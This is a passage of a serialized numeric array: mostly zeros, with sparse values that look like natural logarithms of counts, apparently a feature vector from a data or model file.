0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, \n 4.8991863767100545, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.812184355372417, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.4011973816621555, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 2.1972245773362196, 1.6094379124341003, 0, 0.0, 4.574710978503383, 0, \n 6.462743943876961, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 9.262134127775067, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0,\n 0, 0.0, 0.0, 11.284134957569469, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, \n 6.821864234308754, 0, 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 7.471502607305074, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 0.0, 4.976733742420574, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 3.828641396489095, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 3.8918202981106265, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, \n 2.8398715690385097, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0, 3.044522437723423, 0.0, 0.0, \n 5.846735604451319, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, \n 3.367295829986474, 0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.0, 4.969813299576001, 5.346437018291705, 0.0, 1.7412592803704001, 0.0,\n 1.7412592803704001, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 7.000208219919599, 2.6390573296152584, 0, 0.0, 0, \n 0.6931471805599453, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 2.1972245773362196,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 4.828313737302301, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707,\n 0, 0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 3.6109179126442243, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, \n 6.287897844304593, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 4.795790545596741, 0.0, 0, 8.365613809386995, 0.0, 0.0, \n 0.0, 0.0, 0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.007333185232471, 0, 0, 0.0, 0.0, 3.9512437185814275, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.649511027115099, 3.58351893845611, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.1354942159291497, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.499809670330265, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 3.2188758248682006, 0.0, 4.48863636973214, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.952096120109145, 4.828313737302301, 3.4339872044851467,\n 0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 4.969813299576001, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.127134385045092, 0.0, 0, \n 6.821864234308754, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, \n 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0, 8.802445120171846, 0.0, \n 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 2.5649493574615367, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0,\n 12.404515991916155, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 1.6094379124341003, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.8501476017100584, 0.0, 16.168878379615265, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0, 0.0, \n 3.8005740880419454, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, \n 3.7369991058576035, 0, 1.6094379124341003, 0.0, 0, 16.168230769388487, \n 0, 0.0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 4.143134726391533, 0,\n 0, 0.0, 4.518263445217987, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.941642422609304, 4.700480365792417, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0, 0.0, 0.0, 0.0,\n 3.784189633918261, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0, 3.2188758248682006, \n 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, \n 0.0, 0.0, 4.828313737302301, 0.0, 0, 0, 5.605802066295998, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 5.101797476893978, \n 3.0910424533583156, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 5.101797476893978, 4.969640753475787, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.3694478524670215, 0, 0, 0, 0, 0.0,\n 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 2.70805020110221, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 1.6094379124341003, 0, 0.0, \n 3.2188758248682006, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 2.9444389791664403, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0, \n 3.58351893845611, 0.0, 0.0, 0, 3.7369991058576035, 0.0, \n 4.02535169073515, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 3.0841946160253877, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.182806904693497, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 2.70805020110221, 0, 0, 0, \n 0.0, 10.484135188312967, 7.275172319452771, 0.0, 0, 3.0841946160253872,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 7.953835426675504, 0.0, 2.70805020110221, 0.0, 0, 0, 0, \n 0.0, 0.0, 9.830786204133961, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.3322045101752034, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 0, 0, 0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0, 0, 0, 0, 0.0, \n 0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 4.07753744390572, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 6.356107660695892, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0, 0.0, 0, 0, 0.0, \n 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.127134385045092, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 5.214935757608986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.053835369501174, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 2.1972245773362196, 0, \n 0.0, 2.0794415416798357, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.969640753475787, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.739792912179235, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 